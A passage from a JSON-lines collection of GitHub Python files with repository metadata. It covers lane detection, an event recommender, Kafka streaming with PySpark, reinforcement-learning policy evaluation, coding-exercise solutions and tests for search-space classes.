hsvthresh=(50,255))\n\t\n\t# Combine the filter results\n\tfilteredImage[((sobelx == 1) & (sobely == 1)) | (c_binary == 1)] = 255\n\t\n\t# Define perspective transform\n\timg_size = (img.shape[1],img.shape[0])\n\tbottom_width = 0.75\n\ttop_width = 0.10\n\theight = 0.70\n\tchop_bottom = 0.94\t\t\t# Chop the bottom portion of image that has the car hood\n\t# Source Points\n\tsrc = np.float32([[(0.5*img.shape[1] - 0.5*top_width*img.shape[1]),height*img.shape[0]],\t# Point 1\n\t\t\t[(0.5*img.shape[1] + 0.5*top_width*img.shape[1]),height*img.shape[0]],\t# Point 2\n\t\t\t[(0.5*img.shape[1] - 0.5*bottom_width*img.shape[1]),chop_bottom*img.shape[0]],# Point 3\n\t\t\t[(0.5*img.shape[1] + 0.5*bottom_width*img.shape[1]),chop_bottom*img.shape[0]],# Point 4\t\t\n\t\t\t])\n\toffset = img.shape[1]*0.10 # Offset ratio controls the width between the lanes\n\t# Destination Points\n\tdst = np.float32([[offset,0],[img.shape[1]-offset,0],[offset,img.shape[0]],[img.shape[1]-offset,img.shape[0]]])\n\t\n\t# Apply perspective transform\n\tM = cv2.getPerspectiveTransform(src,dst)\n\tMinv = cv2.getPerspectiveTransform(dst,src)\n\tbinary_warped = cv2.warpPerspective(filteredImage, M, img_size, flags=cv2.INTER_LINEAR)\n\t\n\t# To save images\n\t#wname = './transf_images/warpy_image.jpg'\n\t#cv2.imwrite(wname, result)\n\n# If type of data is video use this block of code\n# which process the frames and saves the final result as an mp4 file\nelif type_of_data == 'video':\n\tprint(\"Processing video data ...\")\n\t\n\tclip_in = VideoFileClip(data)\n\tclip_out = clip_in.fl_image(process_frame)\n\tclip_out.write_videofile(\"output_video.mp4\", audio = False)","repo_name":"sunny1986/SDC_P4_Advanced_Lane_Search","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17953604583","text":"import enum\nimport os\nfrom datetime import date\nfrom sqlalchemy import create_engine, func\nfrom db_model import make_session, metadata, User, Recommended, Popular, Event, EventTopic, UserTopic, Attendances\nimport event_similarity\nimport topic_modeling\nimport collab_filtering\nimport numpy as np\nfrom config import db_connection_string\n\n\nclass Recommender(object):\n\n def __init__(self, db_uri):\n self.engine = create_engine(db_uri)\n self.session = make_session(self.engine)\n metadata.create_all(bind=self.engine)\n\n def cosine_similarity(self):\n \"\"\"\n Train the recommender by creating a tfidf vectorizer and find cosine similarity between events\n :return:\n \"\"\"\n min_similarity = 0.1\n max_similarity = 0.90\n event_similarity.gen_similarities(self.session, min_similarity, max_similarity)\n\n def generate_topics(self, num_topics, num_words, iterations):\n \"\"\"\n Generate topics and map the topics to events using LDA\n \"\"\"\n # 1. Create topics using LDA model\n topic_modeling.topic_modeling(self.session, num_topics, num_words, iterations, \"lda\")\n\n def update_user_topics(self):\n topic_modeling.update_user_topics(self.session)\n\n def run_collab_filtering(self):\n collab_filtering.Collab_Filtering(self.session).run()\n\n def search_keyword(self, search_string):\n return topic_modeling.search_events(self.session, search_string)\n\n def generate_popular(self):\n # Clear the current popular events\n self.session.query(Popular).delete()\n\n popular_events = Popular.get_popular_events(self.session)\n for i, element in enumerate(popular_events):\n e = Popular(element[0].event_id, element[0].attendance_count, 0)\n self.session.add(e)\n self.session.commit()\n\n def recommend_events(self, user_id):\n '''\n The logic should be that if user is following at least one person then recommend the events that the person is attending\n\n :param user_id:\n :return:\n '''\n # Delete previously recommended events for this user\n self.session.query(Recommended).filter(Recommended.user_id == user_id).delete()\n self.session.commit()\n\n # for filtering future events user is already attending\n attending = self.session.query(Attendances.event_id).join(Event, Event.event_id == Attendances.event_id)\\\n .filter(Attendances.user_id == user_id, Event.event_date >= func.now()).all()\n\n # We are going to limit number of events to 20 and rank them based on the below algorithm\n rank = 50\n\n # Recommend person preferences for the user based on the topics user likes\n user_topics = self.session.query(UserTopic).filter(UserTopic.user_id == user_id).order_by(\n 'predicted_score DESC').all()\n\n for i, ut in enumerate(user_topics):\n future_recommended_events = self.session.query(Event).join(EventTopic,\n EventTopic.event_id == Event.event_id).filter(\n Event.event_date >= func.now(), EventTopic.topic_id == ut.topic_id).order_by(\n 'event_topics.score DESC').limit(2)\n for j, fe in enumerate(future_recommended_events):\n if fe.event_id not in attending:\n recommendation = Recommended(fe.event_id, user_id, rank, 4)\n self.session.add(recommendation)\n rank = rank - 1\n\n following_user_events = User.following_user_events(self.session, user_id)\n for i, event in enumerate(following_user_events):\n if event.event_id not in attending:\n recommendation = Recommended(event.event_id, user_id, rank, 2)\n self.session.add(recommendation)\n rank = rank - 1\n self.session.commit()\n\n # Remaining events will be from Popular\n # Skip events that were already recommended higher\n popular_events = self.session.query(Popular).order_by(Popular.num_of_attending, Popular.num_of_clicks)\n for i, event in enumerate(popular_events):\n existing = self.session.query(Recommended).filter(Recommended.event_id == event.event_id).first()\n if event.event_id not in attending:\n if existing is None:\n recommendation = Recommended(event.event_id, user_id, rank, 1)\n self.session.add(recommendation)\n else:\n existing.rank = existing.rank + rank\n rank = rank - 1\n self.session.commit()\n\n\nrecommender = Recommender(db_connection_string)\n\n# recommender.full_migration()\n# recommender.cosine_similarity()\n# recommender.generate_topics()\n# recommender.migrate_additional_events()\n# recommender.migate_justevents()\n# recommender.run_collab_filtering()\n# recommender.migate_justevents()\n#recommender.migrate_users_only()\n#recommender.randomize_attendances()\n\n\nclass RecommendationType(enum.Enum):\n popular = 1\n follower = 2\n content = 3\n collab = 4\n search = 5\n","repo_name":"sashok5/eventpipeline","sub_path":"Recommender.py","file_name":"Recommender.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74298131045","text":"import os\nimport chess.pgn\nfrom state import State\n\n\nresult_value = {\n\t'1-0': \t\t1,\n\t'0-1':\t -1,\n\t'1/2-1/2': \t0\n}\n\npgn = open(os.path.join('PGNDatabase', 'data.pgn'))\n\nwhile 1:\n\tgame = chess.pgn.read_game(pgn)\n\t\n\tif game == None:\n\t\tbreak\n\n\tresult = result_value[game.headers['Result']]\n\t\n\tboard = game.board()\n\n\tfor move in game.mainline_moves():\n\t\tboard.push(move)\n\t\tprint(board)\n\t\tprint()\n\n\tbreak\n","repo_name":"AndreiFlorescu/MLChessEngine","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37651759214","text":"from collections import deque\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nN = int(input())\r\nring = deque(sorted(list(map(int, input().split()))))\r\n\r\nanswer = 0\r\nwhile answer < len(ring)-1:\r\n ring[0] -= 1\r\n answer += 1\r\n \r\n if ring[0] == 0:\r\n ring.popleft() \r\n \r\nprint(answer)","repo_name":"seungjun123/Algorithm","sub_path":"백준/Silver/2785. 체인/체인.py","file_name":"체인.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71847591524","text":"import cv2\r\nimport numpy as np\r\nimport math\r\n\r\nimage = cv2.imread('Lego.png')\r\n\r\n# Dimensions of image\r\nshapeofImage = np.shape(image)\r\nprint(f'The image dimensions are (X, Y, Channels): {shapeofImage}')\r\n\r\nbackdrop = np.zeros((shapeofImage[0], shapeofImage[1]))\r\nprint(backdrop)\r\n\r\ndef empty(x):\r\n pass\r\n\r\ncv2.namedWindow('Crop Settings')\r\ncv2.resizeWindow('Crop Settings', 640, 240)\r\ncv2.createTrackbar('X', 'Crop Settings', 50, shapeofImage[1], empty)\r\ncv2.createTrackbar('Y', 'Crop Settings', 50, shapeofImage[0], empty)\r\n\r\n\r\nwhile True:\r\n\r\n # Creates a copy of the image and overlays contours\r\n imageCopy = image.copy()\r\n \r\n x = cv2.getTrackbarPos('X', 'Crop Settings')\r\n y = cv2.getTrackbarPos('Y', 'Crop Settings')\r\n \r\n cv2.line(imageCopy, pt1 = (x, y), pt2 = (x, 0), color = (0, 0, 0), thickness = 5)\r\n cv2.line(imageCopy, pt1 = (x, y), pt2 = (0, y), color = (0, 0, 0), thickness = 5)\r\n # cv2.circle(imageCopy, )\r\n\r\n cv2.namedWindow(\"Original Image\", cv2.WINDOW_FREERATIO)\r\n cv2.resizeWindow(\"Original Image\", 1280, 720)\r\n cv2.imshow(\"Original Image\", imageCopy)\r\n if cv2.waitKey(1) & 0xFF == ord('b'):\r\n break\r\n\r\n\r\n\r\n\r\n","repo_name":"Jordinaa/Image-Processing-Examples","sub_path":"Example 3.py","file_name":"Example 3.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11505965190","text":"\"\"\"\n Given an array of integers A, return the largest integer that only occurs once.\n\n If no integer occurs once, return -1.\n\n \n\n Example 1:\n\n Input: [5,7,3,9,4,9,8,3,1]\n Output: 8\n Explanation:\n The maximum integer in the array is 9 but it is repeated. The number 8 occurs only once, so it's the answer.\n Example 2:\n\n Input: [9,9,8,8]\n Output: -1\n Explanation:\n There is no number that occurs only once.\n \n\n Note:\n\n 1 <= A.length <= 2000\n 0 <= A[i] <= 1000\n\n\"\"\"\nclass Solution:\n def largestUniqueNumber(self, A: List[int]) -> int:\n if not A: return -1\n table = collections.Counter(A)\n A.sort()\n for i in range(len(A)-1, -1 ,-1):\n if table[A[i]] == 1: return A[i]\n return -1\n","repo_name":"NiuNiu-jupiter/Leetcode","sub_path":"Premuim/1133. Largest Unique Number.py","file_name":"1133. Largest Unique Number.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75302403364","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param headA: the first list\n # @param headB: the second list\n # @return: a ListNode\n def getIntersectionNode(self, headA, headB):\n # Write your code here\n counter_a,counter_b = 1,1\n \n pointerA = headA\n if headA and headB:\n while pointerA.next:\n counter_a += 1\n pointerA = pointerA.next\n pointerB = headB\n while pointerB.next:\n counter_b += 1\n pointerB = pointerB.next\n \n if pointerA.val == pointerB.val:\n pointerA,pointerB = headA,headB\n if counter_a < counter_b:\n count = counter_b - counter_a\n \n for i in range(count):\n pointerB = pointerB.next\n elif counter_b < counter_a:\n count = counter_a - counter_b\n \n for i in range(count):\n pointerA = pointerA.next\n \n while pointerA and pointerB and pointerA.val != pointerB.val :\n pointerA = pointerA.next\n pointerB = pointerB.next\n \n return pointerA\n \n \n ","repo_name":"bxnxiong/Lint-Code","sub_path":"380 intersectionOfTwoLinkedLists.py","file_name":"380 intersectionOfTwoLinkedLists.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43620605595","text":"# ML 2017 hw6\n# Reader\n\nimport numpy as np\nimport csv\n\ndef to_categorical(index, categories):\n categorical = np.zeros(categories, dtype=int)\n categorical[index] = 1\n return list(categorical)\n\n\ndef read_movie(filename):\n\n def genre_to_number(genres, all_genres):\n result = []\n for g in genres.split('|'):\n if g not in all_genres:\n all_genres.append(g)\n result.append( all_genres.index(g) )\n return result, all_genres\n\n movies, all_genres = [[]] * 3953, []\n with open(filename, 'r', encoding='latin-1') as f:\n f.readline()\n for line in f:\n movieID, title, genre = line[:-1].split('::')\n genre_numbers, all_genres = genre_to_number(genre, all_genres)\n movies[int(movieID)] = genre_numbers\n \n categories = len(all_genres)\n for i, m in enumerate(movies):\n movies[i] = to_categorical(m, categories)\n\n print('movies:', np.array(movies).shape)\n return movies, all_genres\n\n\ndef read_user(filename):\n\n genders, ages, occupations = [[]]*6041, [[]]*6041, [ [0]*21 ]*6041\n categories = 21\n with open(filename, 'r', encoding='latin-1') as f:\n f.readline()\n for line in f:\n userID, gender, age, occu, zipcode = line[:-1].split('::')\n genders[int(userID)] = 0 if gender is 'F' else 1\n ages[int(userID)] = int(age)\n occupations[int(userID)] = to_categorical(int(occu), categories)\n \n print('genders:', np.array(genders).shape)\n print('ages:', np.array(ages).shape)\n print('occupations:', np.array(occupations).shape)\n return genders, ages, occupations\n\n\ndef read_train(filename):\n data = []\n with open(filename, 'r') as f:\n f.readline()\n reader = csv.reader(f)\n for row in reader:\n dataID, userID, movieID, rating = row\n data.append( [int(dataID), int(userID), int(movieID), int(rating)] )\n\n print('Train data len:', len(data))\n return np.array(data)\n\n\ndef read_test(filename):\n data = []\n with open(filename, 'r') as f:\n f.readline()\n reader = csv.reader(f)\n for row in reader:\n dataID, userID, movieID = row\n data.append( [dataID, int(userID), int(movieID)] )\n\n print('Test data len:', len(data))\n return np.array(data)\n\n\ndef preprocess(data, genders, ages, occupations, movies):\n\n if data.shape[1] == 4:\n print('Shuffle Data')\n np.random.seed(1019)\n index = np.random.permutation(len(data))\n data = data[index]\n\n print('Get ID')\n userID = np.array(data[:, 1], dtype=int)\n movieID = np.array(data[:, 2], dtype=int)\n\n print('Get Features')\n userGender = np.array(genders)[userID]\n userAge = np.array(ages)[userID]\n userOccu = np.array(occupations)[userID]\n movieGenre = np.array(movies)[movieID]\n\n print('Normalize Ages')\n std = np.std(userAge)\n userAge = userAge / std\n\n Rating = []\n if data.shape[1] == 4:\n print('Get Ratings')\n Rating = data[:, 3].reshape(-1, 1)\n\n print('userID:', userID.shape)\n print('movieID:', movieID.shape)\n print('userGender:', userGender.shape)\n print('userAge:', userAge.shape)\n print('userOccu:', userOccu.shape)\n print('movieGenre:', movieGenre.shape)\n print('Y:', np.array(Rating).shape)\n return userID, movieID, userGender, userAge, userOccu, movieGenre, Rating\n\ndef find_avg_Y(data):\n \n ratingSum = [0] * 6041\n ratingCount = [0] * 6041\n userID = data[:, 1]\n ratings = data[:, 3]\n for i, (uid, r) in enumerate(zip(userID, ratings)):\n print('\\ri:', i, end='', flush=True)\n ratingSum[uid] += r\n ratingCount[uid] += 1\n\n ratingMean = [0] * 6041\n for i, (s, c) in enumerate(zip(ratingSum, ratingCount)):\n if c != 0:\n ratingMean[i] = s / c\n\n userAvgY = np.array(ratingMean)[userID]\n print('\\ruserAvgY:', userAvgY.shape)\n return ratingMean\n","repo_name":"qhan1028/NTU-Machine-Learning","sub_path":"hw6/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"52"} +{"seq_id":"74972855204","text":"from datetime import datetime\n\nimport mlrun\nimport numpy as np\nimport pandas as pd\nimport plotly.express as px\nimport requests\n\n\n@mlrun.handler(\n outputs=[\n \"count\",\n \"error_count\",\n \"avg_latency\",\n \"min_latency\",\n \"max_latency\",\n \"latency_chart:plot\",\n ]\n)\ndef model_server_tester(\n context: mlrun.MLClientCtx,\n dataset: pd.DataFrame,\n endpoint: str,\n label_column: str,\n rows: int = 100,\n max_error: int = 5,\n):\n \"\"\"Test a model server\n :param context: mlrun context\n :param endpoint:\n :param dataset: csv/parquet table with test data\n :param label_column: name of the label column in table\n :param rows: number of rows to use from test set\n :param max_error: maximum error for\n \"\"\"\n\n if rows and rows < dataset.shape[0]:\n dataset = dataset.sample(rows)\n y_list = dataset.pop(label_column).values.tolist()\n count = err_count = 0\n times = []\n print(endpoint)\n for i, y in zip(range(dataset.shape[0]), y_list):\n if err_count == max_error:\n raise ValueError(f\"reached error max limit = {max_error}\")\n count += 1\n event_data = dataset.iloc[i].to_dict()[\"text\"]\n try:\n start = datetime.now()\n resp = requests.post(f\"{endpoint}/predict\", data=event_data.encode(\"utf-8\"))\n if not resp.ok:\n context.logger.error(f\"bad function resp!!\\n{resp.text}\")\n err_count += 1\n continue\n times.append((datetime.now() - start).microseconds)\n\n except OSError as err:\n context.logger.error(f\"error in request, data:{event_data}, error: {err}\")\n err_count += 1\n continue\n\n times_arr = np.array(times)\n latency_chart = px.line(\n x=range(2, len(times) + 1),\n y=times_arr[1:],\n title=\"Latency (microsec) X Invokes\",\n labels={\"y\": \"latency (microsec)\", \"x\": \"invoke number\"},\n )\n\n return (\n count,\n err_count,\n int(np.mean(times_arr)),\n int(np.amin(times_arr)),\n int(np.amax(times_arr)),\n latency_chart,\n )\n","repo_name":"davesh0812/mlrun-huggingface-demo","sub_path":"src/serving_test.py","file_name":"serving_test.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"5988218357","text":"from pyspark import SparkContext\nfrom pyspark import SparkConf\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils, TopicAndPartition, KafkaRDD, KafkaMessageAndMetadata\nimport EventData, time\n\ndef spot_decoder(s):\n if s is None:\n return None\n return s\n\ndef displayRDD( rdd ):\n idList = rdd.collect()\n for _ in idList:\n data = EventData.EventData.GetRootAsEventData( _, 0 )\n print( \"Pulse ID: %s\"\\\n % ( data.PulseId() ) )\n\ndef do_some_work(rdd):\n\tpass\n\ndef process_dstream(rdd):\n displayRDD(rdd)\n krdd = KafkaRDD(rdd._jrdd, sc, rdd._jrdd_deserializer)\n off_ranges = krdd.offsetRanges()\n #for o in off_ranges:\n # print(str(o))\n\ndef setHandler(msg):\n topic = msg.topic\n partition = msg.partition\n offset = msg.offset\n key = msg.key\n message = msg._rawMessage\n msgAndmeta = KafkaMessageAndMetadata( topic, partition, offset, key, message )\n return msgAndmeta\n\ndef getValue( data ):\n return data._rawMessage\n\n\nconf = SparkConf().setAppName(\"mytestApp\")\\\n .set(\"spark.streaming.kafka.maxRatePerPartition\", \"1000\")\\\n .set(\"spark.streaming.kafka.minRatePerPartition\", \"1000\")\n #.set(\"spark.streaming.backpressure.enabled\", \"true\")\\\n #.set(\"spark.streaming.backpressure.initialRate\", \"100\")\\\n\nsc = SparkContext( conf=conf )\n#sc = SparkContext()\nsc.setLogLevel(\"ERROR\") # 减少shell打印日志\nssc = StreamingContext(sc, 1)\ntlist = ['SparkTest']\n\nkafka_params = {\n \"bootstrap.servers\": \"localhost:9092\",\n \"group.id\": \"myUserGroup-0\",\n \"enable.auto.commit\": \"true\",\n \"auto.offset.reset\": \"smallest\"\n}\n\ndstream = KafkaUtils.createDirectStream(ssc, tlist, kafka_params,\\\n\t\tkeyDecoder=spot_decoder,\\\n\t\tvalueDecoder=spot_decoder,\\\n messageHandler=setHandler )\nres = dstream.map( lambda x: getValue(x) )\nres.foreachRDD( lambda x : displayRDD(x) )\n\nssc.start()\nssc.awaitTermination(200)\nssc.stop()\n","repo_name":"Hep-dog/PySpark-Kafka","sub_path":"mainDemo/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72644364325","text":"import random\r\n\"\"\"\r\n\r\n Call your function shuffle_list, it takes a list as a parameter and it returns a shuffled list\r\n Write a function which returns an array of seven random numbers in a range of 0-9. All the numbers must be unique.\r\n\r\n\"\"\"\r\n\r\ndef shuffle_list(arr):\r\n new_arr = random.sample(arr, len(arr));\r\n return new_arr;\r\n\r\narr = [1,2,3,4,5,6,7,8,9,0]\r\nprint(\"This is the shuffled list: \", shuffle_list(arr))\r\n\r\n\r\no = input(\"Enter length of randomly generated list consisting of 0-9: \")\r\ndef randNums(amnt):\r\n amnt = int(amnt)\r\n arr = []\r\n for i in range (amnt) :\r\n arr.append(random.randint(0,9))\r\n return arr;\r\nprint(f\"Your list is: {randNums(o)}\")","repo_name":"Brandon-E-Ramirez/30DaysOfPython","sub_path":"12 - Modules/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16705869597","text":"from random import randint\nfrom time import sleep\nprint('Vamos jogar!')\nwhile True:\n computador = randint(1, 10)\n parimpar = str(input('Escolha entre par ou ímpar [P/I]: ').lower())\n if parimpar == 'i':\n break\n elif parimpar == 'p':\n break\n print('Acho que você não entendeu, escolha \"P\" para par e \"I\" para ímpar, tente novamente')\nsleep(0.3)\nescolha = int(input('Muito bem, agora escolha um número: '))\nsleep(0.5)\nvencedor = resultadoip = 'p'\nvitorias = 0\nwhile True:\n if escolha < 0:\n print('Ei, você está tentando trapacear!')\n elif escolha > 10:\n print('Ei, você não tem mais que 10 dedos, jogue limpo!')\n else:\n resultado = (escolha + computador) % 2\n if resultado == 0:\n vencedor = 'p'\n resultadoip = 'par'\n else:\n vencedor = 'i'\n resultadoip = 'ímpar'\n if vencedor == parimpar:\n print('3...')\n sleep(0.5)\n print('2...')\n sleep(0.5)\n print('1... Já!')\n sleep(0.5)\n print(f'Você escolheu {escolha} e o computador escolheu {computador}')\n print(f'Deu {resultadoip}! você ganhou dessa vez.')\n else:\n print('3...')\n sleep(0.5)\n print('2...')\n sleep(0.5)\n print('1... Já!')\n sleep(0.5)\n print(f'Você escolheu {escolha} e o computador escolheu {computador}\\nDeu {resultadoip}! você perdeu.')\n print(f'Número de vitórias: {vitorias}')\n break\n vitorias += 1\n sleep(0.7)\n print('Vamos tentar novamente...')\n while True:\n computador = randint(1, 10)\n parimpar = str(input('Escolha entre par ou ímpar [P/I]: ').lower())\n if parimpar == 'i':\n break\n elif parimpar == 'p':\n break\n print('Acho que você não entendeu, escolha \"P\" para par e \"I\" para ímpar, tente novamente')\n sleep(0.3)\n escolha = int(input('Agora escolha o número: '))\n sleep(0.5)\n","repo_name":"JRoberto25/Estudo-Python","sub_path":"22 - Jogo Par ou Ímpar com Computador.py","file_name":"22 - Jogo Par ou Ímpar com Computador.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30975714525","text":"# https://deeplearningcourses.com/c/artificial-intelligence-reinforcement-learning-in-python\n# https://www.udemy.com/artificial-intelligence-reinforcement-learning-in-python\nfrom __future__ import print_function, division\nfrom builtins import range\n# Note: you may need to update your version of future\n# sudo pip install -U future\n\n\nimport numpy as np\nfrom grid_world import windy_grid, ACTION_SPACE\n\nSMALL_ENOUGH = 1e-3 # threshold for convergence\n\n\ndef print_values(V, g):\n for i in range(g.rows):\n print(\"---------------------------\")\n for j in range(g.cols):\n v = V.get((i,j), 0)\n if v >= 0:\n print(\" %.2f|\" % v, end=\"\")\n else:\n print(\"%.2f|\" % v, end=\"\") # -ve sign takes up an extra space\n print(\"\")\n\n\ndef print_policy(P, g):\n for i in range(g.rows):\n print(\"---------------------------\")\n for j in range(g.cols):\n a = P.get((i,j), ' ')\n print(\" %s |\" % a, end=\"\")\n print(\"\")\n\n\n\nif __name__ == '__main__':\n\n ### define transition probabilities and grid ###\n # the key is (s, a, s'), the value is the probability\n # that is, transition_probs[(s, a, s')] = p(s' | s, a)\n # any key NOT present will considered to be impossible (i.e. probability 0)\n # we can take this from the grid object and convert it to the format we want\n transition_probs = {}\n\n # to reduce the dimensionality of the dictionary, we'll use deterministic\n # rewards, r(s, a, s')\n # note: you could make it simpler by using r(s') since the reward doesn't\n # actually depend on (s, a)\n rewards = {}\n\n grid = windy_grid()\n for (s, a), v in grid.probs.items():\n for s2, p in v.items():\n transition_probs[(s, a, s2)] = p\n rewards[(s, a, s2)] = grid.rewards.get(s2, 0)\n\n ### probabilistic policy ###\n policy = {\n (2, 0): {'U': 0.5, 'R': 0.5},\n (1, 0): {'U': 1.0},\n (0, 0): {'R': 1.0},\n (0, 1): {'R': 1.0},\n (0, 2): {'R': 1.0},\n (1, 2): {'U': 1.0},\n (2, 1): {'R': 1.0},\n (2, 2): {'U': 1.0},\n (2, 3): {'L': 1.0},\n }\n print_policy(policy, grid)\n\n # initialize V(s) = 0\n V = {}\n for s in grid.all_states():\n V[s] = 0\n\n gamma = 0.9 # discount factor\n\n # repeat until convergence\n it = 0\n while True:\n biggest_change = 0\n for s in grid.all_states():\n if not grid.is_terminal(s):\n old_v = V[s]\n new_v = 0 # we will accumulate the answer\n for a in ACTION_SPACE:\n for s2 in grid.all_states():\n\n # action probability is deterministic\n action_prob = policy[s].get(a, 0)\n \n # reward is a function of (s, a, s'), 0 if not specified\n r = rewards.get((s, a, s2), 0)\n new_v += action_prob * transition_probs.get((s, a, s2), 0) * (r + gamma * V[s2])\n\n # after done getting the new value, update the value table\n V[s] = new_v\n biggest_change = max(biggest_change, np.abs(old_v - V[s]))\n\n print(\"iter:\", it, \"biggest_change:\", biggest_change)\n print_values(V, grid)\n it += 1\n\n if biggest_change < SMALL_ENOUGH:\n break\n print(\"V:\", V)\n print(\"\\n\\n\")\n\n # sanity check\n # at state (1, 2), value is 0.5 * 0.9 * 1 + 0.5 * (-1) = -0.05\n\n","repo_name":"lazyprogrammer/machine_learning_examples","sub_path":"rl/iterative_policy_evaluation_probabilistic.py","file_name":"iterative_policy_evaluation_probabilistic.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":7794,"dataset":"github-code","pt":"52"} +{"seq_id":"2179221396","text":"from fastapi import FastAPI\nfrom starlette.middleware.cors import CORSMiddleware\n\nfrom . import views\n\napp = FastAPI()\n\n# Set all CORS enabled origins\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\napp.include_router(views.router)\n","repo_name":"rednafi/hook-slinger","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"52"} +{"seq_id":"15043672867","text":"from copy import copy\nfrom unittest import TestCase\n\nimport torch\nfrom evocraftsearch.spaces import TupleSpace, BoxSpace, DiscreteSpace, MultiDiscreteSpace, MultiBinarySpace, DictSpace\n\n\nclass TestSpace(TestCase):\n def test_contain(self):\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=0., high=float('inf'), shape=(2, 2)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(10),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n\n for space in spaces:\n sample_1 = space.sample()\n mutate_1 = space.mutate(sample_1)\n sample_2 = space.sample()\n mutate_2 = space.mutate(sample_2)\n assert space.contains(sample_1) and space.contains(mutate_1)\n assert space.contains(sample_2) and space.contains(mutate_2)\n\n def test_equality(self):\n\n spaces = [\n DiscreteSpace(3),\n BoxSpace(low=torch.tensor([-10, 0]), high=torch.tensor([10, 10]), dtype=torch.float32),\n BoxSpace(low=-float('inf'), high=float('inf'), shape=(1, 3)),\n TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]),\n TupleSpace(\n [DiscreteSpace(5), BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)]),\n TupleSpace((DiscreteSpace(5), DiscreteSpace(2), DiscreteSpace(2))),\n MultiDiscreteSpace([2, 2, 100]),\n MultiBinarySpace(6),\n DictSpace({\"position\": DiscreteSpace(5),\n \"velocity\": BoxSpace(low=torch.tensor([0, 0]), high=torch.tensor([1, 5]), dtype=torch.float32)}),\n ]\n\n for space in spaces:\n space1 = space\n space2 = copy(space)\n assert space1 == space2, \"Expected {} to equal {}\".format(space1, space2)\n\n def test_inequality(self):\n space_tuples = [\n (DiscreteSpace(3), DiscreteSpace(4)),\n (MultiDiscreteSpace([2, 2, 100]), MultiDiscreteSpace([2, 2, 8])),\n (MultiBinarySpace(8), MultiBinarySpace(7)),\n (BoxSpace(low=torch.tensor([-10, 0]), high=torch.tensor([10, 10]), dtype=torch.float32),\n BoxSpace(low=torch.tensor([-10, 0]), high=torch.tensor([10, 9]), dtype=torch.float32)),\n (BoxSpace(low=-float(\"inf\"), high=0., shape=(2, 1)),\n BoxSpace(low=0., high=float(\"inf\"), shape=(2, 1))),\n (TupleSpace([DiscreteSpace(5), DiscreteSpace(10)]), TupleSpace([DiscreteSpace(1), DiscreteSpace(10)])),\n (DictSpace({\"position\": DiscreteSpace(5)}), DictSpace({\"position\": DiscreteSpace(4)})),\n (DictSpace({\"position\": DiscreteSpace(5)}), DictSpace({\"speed\": DiscreteSpace(5)})),\n ]\n\n for space_tuple in space_tuples:\n space1, space2 = space_tuple\n assert space1 != space2, \"Expected {} != {}\".format(space1, space2)\n\n def test_sample(self):\n spaces = [\n DiscreteSpace(5),\n BoxSpace(low=0, high=255, shape=(2,), dtype=torch.uint8),\n BoxSpace(low=-float('inf'), high=float('inf'), shape=(3, 3)),\n BoxSpace(low=1., high=float('inf'), shape=(3, 3)),\n BoxSpace(low=-float('inf'), high=2., shape=(3, 3)),\n ]\n\n for space in spaces:\n n_trials = 100\n samples = torch.stack([space.sample() for _ in range(n_trials)])\n if isinstance(space, BoxSpace):\n if space.is_bounded():\n expected_mean = (space.high + space.low) / 2\n elif space.is_bounded(\"below\"):\n expected_mean = 1 + space.low\n elif space.is_bounded(\"above\"):\n expected_mean = -1 + space.high\n else:\n expected_mean = torch.full(space.shape, 0.)\n elif isinstance(space, DiscreteSpace):\n expected_mean = torch.tensor(space.n / 2)\n else:\n raise 